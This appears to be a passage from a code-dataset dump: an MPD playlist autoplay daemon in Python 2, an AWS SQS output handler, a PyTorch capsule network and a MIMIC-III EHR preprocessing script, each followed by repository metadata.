Keeps your MPD playlist filled with music you like
Dependencies : python-mpd
pysqlite
'''
import os
import mpd
import random
import sqlite3
import time
import io
import sys
import socket
## Config
playtime = 70 # Percentage of a song that must be played before
# play count is incremented
mintime = 25 # Minimum length of a track for it
# to be considered a song (in seconds)
flood_delay = 12*60 # Minutes to wait before adding the same song again
tries = 10 # Retry connecting this many times
## /Config
version = "2.0 DEV"
helpstring = """Syntax : """ + sys.argv[0] + """ [command]
command can be one of :
radio [on|off|toggle]
trigger [number]
info [path]
start
stop (synonym: kill)
loglevel [debug|notice|warning|error]
help
version"""
enc = sys.getfilesystemencoding()
#enc = "UTF-8"
def log(msg, stdout=False):
"""Logs to file, and optionally to stdout. Obvious enough"""
alllevels = "DINWE" # Debug, Info, Notice, Warning, Error
loglevels = alllevels[alllevels.find(logLevel):]
if stdout:
print msg[2:]
if msg[0] in loglevels:
logio.write(unicode(msg, enc)+"\n")
def connect(i=1):
log("N Connecting...")
if i == tries:
log("E Could not connect to server D:", stdout=True)
exit(1)
try:
client.connect(host, port)
except socket.error:
log("N Try n°"+str(i)+" failed")
time.sleep(i*3)
connect(i+1)
return
if password:
try:
log("D Using password")
client.password(password)
except mpd.CommandError:
log("E Couldn't connect. Wrong password?", stdout=True)
exit(2)
log("N Connected")
def addsong():
"""Adds a semi-random song to the playlist"""
rand = random.uniform(-0.5, 2)
cursor.execute("SELECT file, listened, added FROM songs "
"WHERE karma>? AND time < ? "
"AND NOT duplicate ORDER BY random() LIMIT 1;",
(rand, int(time.time()-(60*(flood_delay-trigger*3)))))
songdata = cursor.fetchone()
if not songdata:
updateone()
addsong()
else:
newkarma = karma(songdata[1], songdata[2]+1)
cursor.execute(
"UPDATE songs SET added=?, karma=?, time=? WHERE file=?",
(songdata[2]+1, newkarma, int(time.time()), songdata[0],)
)
cursor.execute(
"SELECT inode, dev FROM songs WHERE file=?;",
(songdata[0],)
)
one = cursor.fetchone()
if one and one[0]:
cursor.execute(
"""UPDATE SONGS SET added=?, karma=?, time=? WHERE inode=?
AND dev=?""", (songdata[2]+1, newkarma, int(time.time()),
one[0], one[1])
)
db.commit()
try:
client.add(songdata[0].encode(enc))
log("I Added " + songdata[0].encode(enc))
log("D A:" + str(songdata[2]+1) + ", K:" +
str(newkarma))
except mpd.CommandError:
log("W Couldn't add " + songdata[0].encode(enc))
update(songdata[0])
addsong()
def karma(listened, added):
if listened == 0: listened = 0.1
if added == 0: added = 0.1
return float(listened)/added
def listened(file):
update(file);
try:
cursor.execute("SELECT listened, added FROM songs WHERE file = ?",
(file,))
songdata = cursor.fetchone()
newkarma = karma(songdata[0]+1, songdata[1])
cursor.execute(
"UPDATE songs SET listened=?, karma=?, time=? WHERE file=?",
(songdata[0]+1, newkarma, int(time.time()), file)
)
cursor.execute(
"SELECT inode, dev FROM songs WHERE file=?;",
(file,)
)
one = cursor.fetchone()
if one and one[0]:
cursor.execute(
"""UPDATE SONGS SET listened=?, karma=?, time=? WHERE inode=?
AND dev=?""", (songdata[0]+1, newkarma, int(time.time()),
one[0], one[1])
)
db.commit()
log("I Listened to " + file.encode(enc))
log("D L:" + str(songdata[0]+1) + ", K:" +str(newkarma))
except (KeyError, TypeError): # on songdata[n]
pass
allsongs = []
def updateone():
if allsongs == []:
cursor.execute("VACUUM;")
for song in client.list("file"):
allsongs.append(unicode(song, enc))
for song in cursor.execute("SELECT file FROM songs;"):
allsongs.append(song[0])
random.shuffle(allsongs)
song = allsongs.pop()
update(song)
def update(song):
# Check if the file is in mpd
records = client.search("filename", song.encode(enc))
if not any(unicode(r['file'], enc) == song for r in records):
log("N Update : Removing " + song.encode(enc))
cursor.execute("delete from songs where file=?", (song,))
db.commit()
return
inode = dev = None
duplicate = False
listened, added, karma = 0, 0, 5
if musicdir:
# Check for duplicate in FS
try:
s = os.stat(musicdir + "/" + song.encode(enc))
inode = s.st_ino
dev = s.st_dev
cursor.execute("SELECT listened, added, karma FROM songs WHERE file!=? AND inode=?" +
"AND dev=? AND NOT duplicate;", (song, inode, dev))
one = cursor.fetchone();
if one:
duplicate=True
listened, added, karma = one
cursor.execute("""UPDATE songs SET listened=?, added=?, karma=?,
inode=?, dev=?, duplicate=? WHERE file=?""",
(listened, added, karma, inode, dev, duplicate, song))
else:
cursor.execute("""UPDATE songs SET inode=?, dev=?, duplicate=? WHERE file=?""",
(inode, dev, duplicate, song))
except OSError:
log("E Couldn't stat " + musicdir + "/" + song.encode(enc))
pass
# Check if the file is in DB
cursor.execute("SELECT 1 FROM songs WHERE file=?", (song,))
if cursor.fetchone() == None:
log("N Update : Adding " + song.encode(enc))
cursor.execute("INSERT INTO songs"+
"(file, listened, added, karma, time, inode, dev, duplicate)"+
"VALUES (?, ?, ?, ?, 0, ?, ?, ?);",
(song, listened, added, karma, inode, dev, duplicate))
db.commit()
def getSetting(name, default=None):
cursor.execute("""SELECT value FROM setting
WHERE name = ?;""", (name,))
one = cursor.fetchone()
if not one and default:
setSetting(name, default)
return default
if not one: return None
return one[0]
def setSetting(name, val):
val = str(val)
if getSetting(name) == None:
cursor.execute("""INSERT INTO setting (name, value)
VALUES (?, ?);""", (name, val))
else:
cursor.execute("""UPDATE setting SET value = ?
WHERE name = ?;""", (val, name))
db.commit()
def initDB():
cursor.execute("""CREATE TABLE IF NOT EXISTS setting(
name text not null,
value text
);""")
cursor.execute("""CREATE TABLE IF NOT EXISTS songs(
file text not null,
listened int not null default 0,
added int not null default 0,
karma real not null default 5,
time int not null default 0,
inode int,
dev int,
duplicate boolean not null default 0
);""")
db.commit()
dbversion = getSetting("dbversion")
cursor.execute("""SELECT 1 FROM songs LIMIT 1;""")
if cursor.fetchone() and not dbversion: # old db
setSetting("dbversion", "1")
elif not dbversion:
setSetting("dbversion", "3")
else:
if int(dbversion) < 2:
cursor.execute("""ALTER TABLE songs ADD COLUMN inode int;""")
cursor.execute("""ALTER TABLE songs ADD COLUMN dev int;""")
setSetting("dbversion", "2")
if int(dbversion) < 3:
cursor.execute("""ALTER TABLE songs ADD COLUMN duplicate boolean
not null default 0;""")
setSetting("dbversion", "3")
db.commit()
def shutdown():
s.shutdown(socket.SHUT_RDWR)
s.close()
os.unlink(datahome + "/socket")
client.disconnect()
os.unlink(datahome + "/pid")
log("N Shutdown")
def triggerStatus():
return "Trigger : " + str(trigger) + "\n"
def radioStatus():
return "Radio mode : " +\
("Enabled" if radioMode else "Disabled") + "\n"
def pprintSong(file=None):
try:
if not file:
song = client.currentsong()
else:
song = client.find("file", file.encode(enc))[0]
cursor.execute("""SELECT listened, added, karma FROM songs
WHERE file = ?""", (unicode(song['file'], enc),))
one = cursor.fetchone()
if not one:
return "\n"
prettysong = song['file']
try:
prettysong = song['title']
prettysong = song['artist'] + " - " + prettysong
except (KeyError, TypeError): pass
return prettysong + """
Listened : """ + str(one[0]) + """
Added : """ + str(one[1]) + """
Karma : """ + str(one[2]) + "\n"
except (IndexError, KeyError, mpd.ConnectionError):
return "\n";
def sockAccept():
global client, db, cursor, s
global trigger, radioMode, logLevel
global allsongs
try: #Socket error
c, _ = s.accept()
c.settimeout(1)
comm = ""
try:
while comm[-1:] != "\n":
comm += c.recv(1024)
except socket.error:
comm=""
c.settimeout(0)
comm = comm[:-1]
if len(comm) != 0:
if comm == "kill" or comm == "stop":
c.send("Shutting down server...\n")
c.shutdown(socket.SHUT_RD)
c.close()
shutdown()
exit(0)
elif comm[:5] == "radio":
if comm[6:] in ("off", "no", "stop"): radioMode = False
elif comm[6:] in ("on", "yes", "start"): radioMode = True
elif comm[6:] == "toggle": radioMode = not radioMode
elif comm[5:6] == " ": c.send("Syntax: autoplay radio [on|off|toggle]\n")
c.send(radioStatus())
setSetting("radioMode", str(radioMode))
elif comm[:7] == "trigger":
try:
trigger = int(comm[8:])
setSetting("trigger", str(trigger))
except ValueError:
if comm[7:8] == " ":
c.send("\"" + comm[8:] + "\" is not a valid number")
c.send(triggerStatus())
elif comm[:8] == "loglevel":
if comm[9:].lower() in ("d", "debug"): logLevel = "D"
elif comm[9:].lower() in ("n", "notice"): logLevel = "N"
elif comm[9:].lower() in ("w", "warning"): logLevel = "W"
elif comm[9:].lower() in ("e", "error"): logLevel = "E"
elif comm[8:9] == " ":
c.send("Syntax: autoplay loglevel [debug|notice|warning|error]\n")
c.send("Log level : " + logLevel + "\n")
setSetting("logLevel", logLevel)
elif comm[:4] == "info":
if comm[4:] != "": c.send(pprintSong(comm[5:]))
else: c.send(pprintSong())
elif comm[:6] == "update":
if comm[7:] == "all":
c.send("This may be *very* long, depending on the size of your"
+ " library.\n")
allsongs = []
updateone()
c.send(str(len(allsongs) + 1) + " songs to update\n\n" )
while allsongs != []:
if len(allsongs) % 200 == 0:
c.send(str(len(allsongs)) + " remaining...\n")
updateone()
c.send("Done")
else:
update(unicode(comm[7:],enc))
elif comm in ("help","-h","--help"):
c.send(helpstring + "\n\n")
elif comm in ("version", "-V"):
c.send("Autoplay v" + version + "\n")
else:
log("W Unknown command : " + comm)
c.send("Unknown command : " + comm + "\n")
c.send(helpstring + "\n")
else:
c.send(radioStatus())
if radioMode: c.send(triggerStatus())
c.shutdown(socket.SHUT_RDWR)
c.close()
return True;
except socket.error:
return False;
def serve():
global client, db, cursor, s
global trigger, radioMode, logLevel
global allsongs
s = socket.socket(socket.AF_UNIX)
s.bind(datahome + "/socket")
s.settimeout(.3)
s.listen(2)
db = sqlite3.connect((datahome+"/db.sqlite").encode(enc))
cursor = db.cursor()
initDB()
logLevel = getSetting("logLevel", "W")
radioMode = getSetting("radioMode", "True") == "True"
trigger = int(getSetting("trigger", 6))
random.seed()
client = mpd.MPDClient()
connect()
armed = True
lastUpdate = 0
lastMpd = time.time()
log("D Music dir is located at " + str(musicdir))
log("N Ready")
while True:
try: #KeyboardInterrupt
if sockAccept():
lastUpdate = lastMpd = time.time()
next
try: #MPD or socket error
clock = time.time()
if clock - lastUpdate >= 5:
lastUpdate = clock
updateone()
if clock - lastMpd >= .6:
lastMpd = clock
if radioMode:
if client.status()["consume"] == "0":
cursongid = client.status()["songid"]
for song in client.playlistid():
if song["id"] == cursongid:
neededlength = int(song["pos"]) + trigger
else:
neededlength = trigger
if len(client.playlist()) < neededlength:
addsong()
lastMpd = 0
if client.status()['state'] == "play":
times = client.status()['time'].split(":")
pos = int(times[0])
end = int(times[1])
currentsong = client.currentsong()
if not armed and "id" in currentsong and not songid == currentsong["id"]:
armed = True
elif armed and (end > mintime) and (pos > playtime*end/100):
armed = False # Disarm until the next song
listened(unicode(currentsong["file"], enc))
songid = (currentsong["id"])
except (KeyError, TypeError):
pass
except (socket.error, mpd.ConnectionError):
log("W Connection to MPD lost")
client.disconnect()
connect()
except KeyboardInterrupt:
s.shutdown(socket.SHUT_RDWR)
def getServSock():
try:
pidf = open(datahome + "/pid") #IOError
pid = pidf.read()
pidf.close()
os.kill(int(pid), 0) #OSError on kill, ValueError on int
except (IOError, OSError, ValueError):
print("Starting server...")
try:
os.unlink(datahome + "/socket")
except OSError:
pass
pid = os.fork()
if pid == 0:
serve()
pidf = open(datahome + "/pid", "w")
pidf.write(str(pid))
pidf.close()
s = socket.socket(socket.AF_UNIX)
try:
s.connect(datahome + "/socket")
except socket.error:
try:
s = getServSock()
except RuntimeError: # recursion
log("E Couldn't connect to socket", True)
exit(1)
return s
logLevel = "D"
datahome = (os.getenv("XDG_DATA_HOME") or os.getenv("HOME") +
"/.local/share") + "/autoplay"
if not os.access(datahome, os.W_OK):
try:
os.makedirs(datahome)
except os.error:
log("E Couldn't access nor create" + datahome + ", quitting", True)
exit(2)
password = None
host = os.getenv("MPD_HOST", "127.0.0.1")
atloc = host.find("@")
if(atloc != -1):
password = host[:atloc]
host = host[atloc+1:]
port = os.getenv("MPD_PORT", "6600")
musicdir = os.getenv("MPD_MUSIC_DIR") or os.getenv("mpd_music_dir")
logio = io.open(datahome + "/log", "at", buffering=1, encoding=enc)
if __name__ == "__main__":
silent = False
s = getServSock()
try:
if len(sys.argv) <= 1 or sys.argv[1] != "start":
s.sendall(" ".join(sys.argv[1:]) + "\n")
data = s.recv(1024)
while data != "":
print data,
data = s.recv(1024)
except KeyboardInterrupt:
pass
s.shutdown(socket.SHUT_RDWR)
s.close()
# vim: tw=70 ts=2 sw=2
| 11,557 | 0 | 344 |
dc4f791b106666858e2a4f2913316894e07b0ff6 | 2,528 | py | Python | igata/handlers/aws/output/sqs.py | kiconiaworks/igata | 1d8a4b82a65eb936d5d8f8ff70747ba82ddef31a | [
"BSD-2-Clause"
] | 1 | 2021-12-31T14:29:44.000Z | 2021-12-31T14:29:44.000Z | igata/handlers/aws/output/sqs.py | kiconiaworks/igata | 1d8a4b82a65eb936d5d8f8ff70747ba82ddef31a | [
"BSD-2-Clause"
] | 6 | 2019-11-25T04:20:26.000Z | 2021-12-13T05:23:16.000Z | igata/handlers/aws/output/sqs.py | kiconiaworks/igata | 1d8a4b82a65eb936d5d8f8ff70747ba82ddef31a | [
"BSD-2-Clause"
] | null | null | null | import json
import logging
from collections import Counter
from typing import Union
import boto3
from .... import settings
from . import OutputCtxManagerBase
logger = logging.getLogger("cliexecutor")
SQS = boto3.client("sqs", endpoint_url=settings.SQS_ENDPOINT, region_name="ap-northeast-1")
class SQSRecordOutputCtxManager(OutputCtxManagerBase):
"""Predictor.predict() resutls will use `put_records()` to output to the envar defined SQS Queue"""
@classmethod
def required_kwargs(cls) -> tuple:
"""
Define the required fields for Class instantiation.
Fields defined here can be used as environment variables by prefixing the value with 'OUTPUT_CTXMGR_' and putting values in uppercase.
Ex:
OUTPUT_CTXMGR_SQS_QUEUE_URL
"""
required = ("sqs_queue_url",)
return required
def put_records(self, records: Union[dict, list]):
"""
Call to send result defined in JSON parsable `message_body` to SQS.
.. note::
given `message_body` will be converted to JSON and sent to the defined SQS Queue.
"""
summary = Counter()
max_sqs_message_body_bytes = 2048
for record in records:
message_body_json = json.dumps(record)
message_body_utf8_bytes = len(message_body_json.encode("utf8"))
logger.info(f"Message Bytes={message_body_utf8_bytes}")
if message_body_utf8_bytes > max_sqs_message_body_bytes:
logger.error(f"message_body_utf8_bytes({message_body_utf8_bytes}) > max_sqs_message_body_bytes({max_sqs_message_body_bytes})")
logger.debug(f"Queuing({self.sqs_queue_url}): {record}")
response = SQS.send_message(QueueUrl=self.sqs_queue_url, MessageBody=message_body_json)
logger.debug(f"response: {response}")
summary["sent_messages"] += 1
return summary
| 37.731343 | 142 | 0.676424 | import json
import logging
from collections import Counter
from typing import Union
import boto3
from .... import settings
from . import OutputCtxManagerBase
logger = logging.getLogger("cliexecutor")
SQS = boto3.client("sqs", endpoint_url=settings.SQS_ENDPOINT, region_name="ap-northeast-1")
class SQSRecordOutputCtxManager(OutputCtxManagerBase):
"""Predictor.predict() resutls will use `put_records()` to output to the envar defined SQS Queue"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.sqs_queue_url = kwargs.get("sqs_queue_url", None)
assert self.sqs_queue_url.startswith("http")
@classmethod
def required_kwargs(cls) -> tuple:
"""
Define the required fields for Class instantiation.
Fields defined here can be used as environment variables by prefixing the value with 'OUTPUT_CTXMGR_' and putting values in uppercase.
Ex:
OUTPUT_CTXMGR_SQS_QUEUE_URL
"""
required = ("sqs_queue_url",)
return required
def put_records(self, records: Union[dict, list]):
"""
Call to send result defined in JSON parsable `message_body` to SQS.
.. note::
given `message_body` will be converted to JSON and sent to the defined SQS Queue.
"""
summary = Counter()
max_sqs_message_body_bytes = 2048
for record in records:
message_body_json = json.dumps(record)
message_body_utf8_bytes = len(message_body_json.encode("utf8"))
logger.info(f"Message Bytes={message_body_utf8_bytes}")
if message_body_utf8_bytes > max_sqs_message_body_bytes:
logger.error(f"message_body_utf8_bytes({message_body_utf8_bytes}) > max_sqs_message_body_bytes({max_sqs_message_body_bytes})")
logger.debug(f"Queuing({self.sqs_queue_url}): {record}")
response = SQS.send_message(QueueUrl=self.sqs_queue_url, MessageBody=message_body_json)
logger.debug(f"response: {response}")
summary["sent_messages"] += 1
return summary
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
# make sure that any remaining records are put
# --> records added byt the `` defined in OutputCtxManagerBase where self._record_results is populated
if self._record_results:
logger.debug(f"put_records(): {len(self._record_results)}")
self.put_records(self._record_results)
| 529 | 0 | 81 |
e9e1e37dad186954ae5ac1b1729fca8e3c617b7a | 1,768 | py | Python | capsule/net.py | VIVelev/capsnets | dca4bfcd4007977a6bc3534a4676880326fcf94a | [
"MIT"
] | null | null | null | capsule/net.py | VIVelev/capsnets | dca4bfcd4007977a6bc3534a4676880326fcf94a | [
"MIT"
] | null | null | null | capsule/net.py | VIVelev/capsnets | dca4bfcd4007977a6bc3534a4676880326fcf94a | [
"MIT"
] | 1 | 2019-11-03T09:39:49.000Z | 2019-11-03T09:39:49.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from .layers import ConvLayer, Decoder, DigitCaps, PrimaryCaps
__all__ = [
'CapsNet',
]
class CapsNet(nn.Module):
'''Capsule Network'''
@staticmethod
@staticmethod
@staticmethod
| 34 | 124 | 0.662896 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .layers import ConvLayer, Decoder, DigitCaps, PrimaryCaps
__all__ = [
'CapsNet',
]
class CapsNet(nn.Module):
'''Capsule Network'''
def __init__(self, num_capsules=10, in_channels=1, num_inputs_per_capsule=32*6*6, out_dim=28*28, cuda=False):
super(CapsNet, self).__init__()
CapsNet.num_capsules = num_capsules
self.conv_layer = ConvLayer(in_channels=in_channels)
self.primary_capsules = PrimaryCaps()
self.digit_capsules = DigitCaps(num_capsules=num_capsules, num_inputs_per_capsule=num_inputs_per_capsule, cuda=cuda)
self.decoder = Decoder(num_capsules=num_capsules, out_dim=out_dim)
def forward(self, x, y=None):
x = self.conv_layer(x)
x = self.primary_capsules(x)
x = self.digit_capsules(x)
reconstruction = self.decoder(x, y)
return x, x.norm(dim=-1), reconstruction
@staticmethod
def loss(output, targets, reconstruction, images):
return CapsNet.margin_loss(output, targets) + \
CapsNet.reconstruction_loss(reconstruction, images)
@staticmethod
def margin_loss(output, targets, lmbd=0.5, m_plus=0.9, m_minus=0.1):
targets = F.one_hot(targets, CapsNet.num_capsules).float()
left = torch.clamp(m_plus - output, min=0)**2
right = torch.clamp(output - m_minus, min=0)**2
loss = targets * left + lmbd*(1 - targets) * right
return loss.sum(dim=1).mean()
@staticmethod
def reconstruction_loss(reconstruction, images, criterion=nn.MSELoss(), alpha=0.0005):
return alpha*criterion(reconstruction, images.view(reconstruction.size(0), -1))
| 1,352 | 0 | 136 |
b5c3cdefd2b6a2c429eb27b4ed87e962300b20ff | 17,030 | py | Python | codes/PrepareDataset.py | yanda-wang/ARMGA | f2dcade00b1271e5814dacaa2b6f9de63ea7077a | [
"BSD-3-Clause"
] | 4 | 2021-03-23T23:37:03.000Z | 2022-01-13T01:13:28.000Z | codes/PrepareDataset.py | yanda-wang/ARMGA | f2dcade00b1271e5814dacaa2b6f9de63ea7077a | [
"BSD-3-Clause"
] | null | null | null | codes/PrepareDataset.py | yanda-wang/ARMGA | f2dcade00b1271e5814dacaa2b6f9de63ea7077a | [
"BSD-3-Clause"
] | null | null | null | import csv
import dill
import itertools
import math
import pandas as pd
import numpy as np
from itertools import combinations
from sklearn.model_selection import train_test_split
from tqdm import tqdm
med_file = 'data/PRESCRIPTIONS.csv'
diag_file = 'data/DIAGNOSES_ICD.csv'
procedure_file = 'data/PROCEDURES_ICD.csv'
ndc2atc_file = 'data/ndc2atc_level4.csv'
cid_atc = 'data/drug-atc.csv'
ndc2rxnorm_file = 'data/ndc2rxnorm_mapping.txt'
drug_ddi_file = 'data/drug-DDI.csv'
drug_stitch2atc_file = 'data/drug_stitch2atc.csv'
DDI_MATRIX_FILE = 'data/ddi_matrix_tail_top100.pkl'
EHR_MATRIX_FILE = 'data/ehr_matrix_1.0.pkl'
PATIENT_RECORDS_FILE = 'data/patient_records.pkl'
PATIENT_RECORDS_FINAL_FILE = 'data/patient_records_final.pkl'
PATIENT_RECORDS_FILE_ACCUMULATE = 'data/patient_records_accumulate_tail_top100.pkl'
PATIENT_RECORDS_FILE_SEPARATE = 'data/patient_records_separate_tail_top100.pkl'
CONCEPTID_FILE = 'data/concepts2id_mapping.pkl'
# DIAGNOSES_INDEX = 0
# PROCEDURES_INDEX = 1
# MEDICATIONS_INDEX = 2
VOC_FILE = 'data/voc.pkl'
GRAPH_FILE = 'data/graph.pkl'
# ===================处理原始EHR数据,选取对应记录================
# we borrow part of the codes from https://github.com/sjy1203/GAMENet
# ======================
# given a sequence of medical concepts, obtain their ids and store the mapping
if __name__ == '__main__':
process_ehr()
map_concepts2id()
build_ddi_matrix()
build_patient_records()
data_sampling()
build_co_occurrence_matrix()
| 41.740196 | 150 | 0.661362 | import csv
import dill
import itertools
import math
import pandas as pd
import numpy as np
from itertools import combinations
from sklearn.model_selection import train_test_split
from tqdm import tqdm
med_file = 'data/PRESCRIPTIONS.csv'
diag_file = 'data/DIAGNOSES_ICD.csv'
procedure_file = 'data/PROCEDURES_ICD.csv'
ndc2atc_file = 'data/ndc2atc_level4.csv'
cid_atc = 'data/drug-atc.csv'
ndc2rxnorm_file = 'data/ndc2rxnorm_mapping.txt'
drug_ddi_file = 'data/drug-DDI.csv'
drug_stitch2atc_file = 'data/drug_stitch2atc.csv'
DDI_MATRIX_FILE = 'data/ddi_matrix_tail_top100.pkl'
EHR_MATRIX_FILE = 'data/ehr_matrix_1.0.pkl'
PATIENT_RECORDS_FILE = 'data/patient_records.pkl'
PATIENT_RECORDS_FINAL_FILE = 'data/patient_records_final.pkl'
PATIENT_RECORDS_FILE_ACCUMULATE = 'data/patient_records_accumulate_tail_top100.pkl'
PATIENT_RECORDS_FILE_SEPARATE = 'data/patient_records_separate_tail_top100.pkl'
CONCEPTID_FILE = 'data/concepts2id_mapping.pkl'
# DIAGNOSES_INDEX = 0
# PROCEDURES_INDEX = 1
# MEDICATIONS_INDEX = 2
VOC_FILE = 'data/voc.pkl'
GRAPH_FILE = 'data/graph.pkl'
# ===================处理原始EHR数据,选取对应记录================
# we borrow part of the codes from https://github.com/sjy1203/GAMENet
def process_procedure():
pro_pd = pd.read_csv(procedure_file, dtype={'ICD9_CODE': 'category'})
pro_pd.drop(columns=['ROW_ID'], inplace=True)
# pro_pd = pro_pd[pro_pd['SEQ_NUM']<5]
# def icd9_tree(x):
# if x[0]=='E':
# return x[:4]
# return x[:3]
# pro_pd['ICD9_CODE'] = pro_pd['ICD9_CODE'].map(icd9_tree)
pro_pd.drop_duplicates(inplace=True)
pro_pd.sort_values(by=['SUBJECT_ID', 'HADM_ID', 'SEQ_NUM'], inplace=True)
pro_pd.drop(columns=['SEQ_NUM'], inplace=True)
pro_pd.drop_duplicates(inplace=True)
pro_pd.reset_index(drop=True, inplace=True)
return pro_pd
def process_med():
med_pd = pd.read_csv(med_file, dtype={'NDC': 'category'})
# filter
med_pd.drop(columns=['ROW_ID', 'DRUG_TYPE', 'DRUG_NAME_POE', 'DRUG_NAME_GENERIC',
'FORMULARY_DRUG_CD', 'GSN', 'PROD_STRENGTH', 'DOSE_VAL_RX',
'DOSE_UNIT_RX', 'FORM_VAL_DISP', 'FORM_UNIT_DISP', 'FORM_UNIT_DISP',
'ROUTE', 'ENDDATE', 'DRUG'], axis=1, inplace=True)
med_pd.drop(index=med_pd[med_pd['NDC'] == '0'].index, axis=0, inplace=True)
med_pd.fillna(method='pad', inplace=True)
med_pd.dropna(inplace=True)
med_pd.drop_duplicates(inplace=True)
med_pd['ICUSTAY_ID'] = med_pd['ICUSTAY_ID'].astype('int64')
med_pd['STARTDATE'] = pd.to_datetime(med_pd['STARTDATE'], format='%Y-%m-%d %H:%M:%S')
med_pd.sort_values(by=['SUBJECT_ID', 'HADM_ID', 'ICUSTAY_ID', 'STARTDATE'], inplace=True)
med_pd = med_pd.reset_index(drop=True)
def filter_first24hour_med(med_pd):
med_pd_new = med_pd.drop(columns=['NDC'])
med_pd_new = med_pd_new.groupby(by=['SUBJECT_ID', 'HADM_ID', 'ICUSTAY_ID']).head([1]).reset_index(drop=True)
med_pd_new = pd.merge(med_pd_new, med_pd, on=['SUBJECT_ID', 'HADM_ID', 'ICUSTAY_ID', 'STARTDATE'])
med_pd_new = med_pd_new.drop(columns=['STARTDATE'])
return med_pd_new
med_pd = filter_first24hour_med(med_pd)
# med_pd = med_pd.drop(columns=['STARTDATE'])
med_pd = med_pd.drop(columns=['ICUSTAY_ID'])
med_pd = med_pd.drop_duplicates()
med_pd = med_pd.reset_index(drop=True)
# visit > 2
def process_visit_lg2(med_pd):
a = med_pd[['SUBJECT_ID', 'HADM_ID']].groupby(by='SUBJECT_ID')['HADM_ID'].unique().reset_index()
a['HADM_ID_Len'] = a['HADM_ID'].map(lambda x: len(x))
a = a[a['HADM_ID_Len'] > 1]
return a
med_pd_lg2 = process_visit_lg2(med_pd).reset_index(drop=True)
med_pd = med_pd.merge(med_pd_lg2[['SUBJECT_ID']], on='SUBJECT_ID', how='inner')
return med_pd.reset_index(drop=True)
def process_diag():
diag_pd = pd.read_csv(diag_file)
diag_pd.dropna(inplace=True)
diag_pd.drop(columns=['SEQ_NUM', 'ROW_ID'], inplace=True)
diag_pd.drop_duplicates(inplace=True)
diag_pd.sort_values(by=['SUBJECT_ID', 'HADM_ID'], inplace=True)
return diag_pd.reset_index(drop=True)
def ndc2atc4(med_pd):
with open(ndc2rxnorm_file, 'r') as f:
ndc2rxnorm = eval(f.read())
med_pd['RXCUI'] = med_pd['NDC'].map(ndc2rxnorm)
med_pd.dropna(inplace=True)
rxnorm2atc = pd.read_csv(ndc2atc_file)
rxnorm2atc = rxnorm2atc.drop(columns=['YEAR', 'MONTH', 'NDC'])
rxnorm2atc.drop_duplicates(subset=['RXCUI'], inplace=True)
med_pd.drop(index=med_pd[med_pd['RXCUI'].isin([''])].index, axis=0, inplace=True)
med_pd['RXCUI'] = med_pd['RXCUI'].astype('int64')
med_pd = med_pd.reset_index(drop=True)
med_pd = med_pd.merge(rxnorm2atc, on=['RXCUI'])
med_pd.drop(columns=['NDC', 'RXCUI'], inplace=True)
med_pd = med_pd.rename(columns={'ATC4': 'NDC'})
med_pd['NDC'] = med_pd['NDC'].map(lambda x: x[:4])
med_pd = med_pd.drop_duplicates()
med_pd = med_pd.reset_index(drop=True)
return med_pd
def filter_1000_most_pro(pro_pd):
pro_count = pro_pd.groupby(by=['ICD9_CODE']).size().reset_index().rename(columns={0: 'count'}).sort_values(
by=['count'], ascending=False).reset_index(drop=True)
pro_pd = pro_pd[pro_pd['ICD9_CODE'].isin(pro_count.loc[:1000, 'ICD9_CODE'])]
return pro_pd.reset_index(drop=True)
def filter_2000_most_diag(diag_pd):
diag_count = diag_pd.groupby(by=['ICD9_CODE']).size().reset_index().rename(columns={0: 'count'}).sort_values(
by=['count'], ascending=False).reset_index(drop=True)
diag_pd = diag_pd[diag_pd['ICD9_CODE'].isin(diag_count.loc[:1999, 'ICD9_CODE'])]
return diag_pd.reset_index(drop=True)
def filter_300_most_med(med_pd):
med_count = med_pd.groupby(by=['NDC']).size().reset_index().rename(columns={0: 'count'}).sort_values(by=['count'],
ascending=False).reset_index(
drop=True)
med_pd = med_pd[med_pd['NDC'].isin(med_count.loc[:299, 'NDC'])]
return med_pd.reset_index(drop=True)
def process_ehr():
# get med and diag (visit>=2)
med_pd = process_med()
med_pd = ndc2atc4(med_pd)
# med_pd = filter_300_most_med(med_pd)
diag_pd = process_diag()
diag_pd = filter_2000_most_diag(diag_pd)
pro_pd = process_procedure()
# pro_pd = filter_1000_most_pro(pro_pd)
med_pd_key = med_pd[['SUBJECT_ID', 'HADM_ID']].drop_duplicates()
diag_pd_key = diag_pd[['SUBJECT_ID', 'HADM_ID']].drop_duplicates()
pro_pd_key = pro_pd[['SUBJECT_ID', 'HADM_ID']].drop_duplicates()
combined_key = med_pd_key.merge(diag_pd_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
combined_key = combined_key.merge(pro_pd_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
diag_pd = diag_pd.merge(combined_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
med_pd = med_pd.merge(combined_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
pro_pd = pro_pd.merge(combined_key, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
# flatten and merge
diag_pd = diag_pd.groupby(by=['SUBJECT_ID', 'HADM_ID'])['ICD9_CODE'].unique().reset_index()
med_pd = med_pd.groupby(by=['SUBJECT_ID', 'HADM_ID'])['NDC'].unique().reset_index()
pro_pd = pro_pd.groupby(by=['SUBJECT_ID', 'HADM_ID'])['ICD9_CODE'].unique().reset_index().rename(
columns={'ICD9_CODE': 'PRO_CODE'})
med_pd['NDC'] = med_pd['NDC'].map(lambda x: list(x))
pro_pd['PRO_CODE'] = pro_pd['PRO_CODE'].map(lambda x: list(x))
data = diag_pd.merge(med_pd, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
data = data.merge(pro_pd, on=['SUBJECT_ID', 'HADM_ID'], how='inner')
# data['ICD9_CODE_Len'] = data['ICD9_CODE'].map(lambda x: len(x))
data['NDC_Len'] = data['NDC'].map(lambda x: len(x))
patient_records = []
for subject_id in data['SUBJECT_ID'].unique():
item_df = data[data['SUBJECT_ID'] == subject_id]
patient = []
for index, row in item_df.iterrows():
admission = []
admission.append([item for item in row['NDC']]) # medications
admission.append([item for item in row['ICD9_CODE']]) # diagnoses
admission.append([item for item in row['PRO_CODE']]) # procedures
patient.append(admission)
patient_records.append(patient)
dill.dump(patient_records, open(PATIENT_RECORDS_FILE, 'wb'))
# ======================
class Concept2Id(object):
def __init__(self):
self.concept2id = {}
self.id2concept = {}
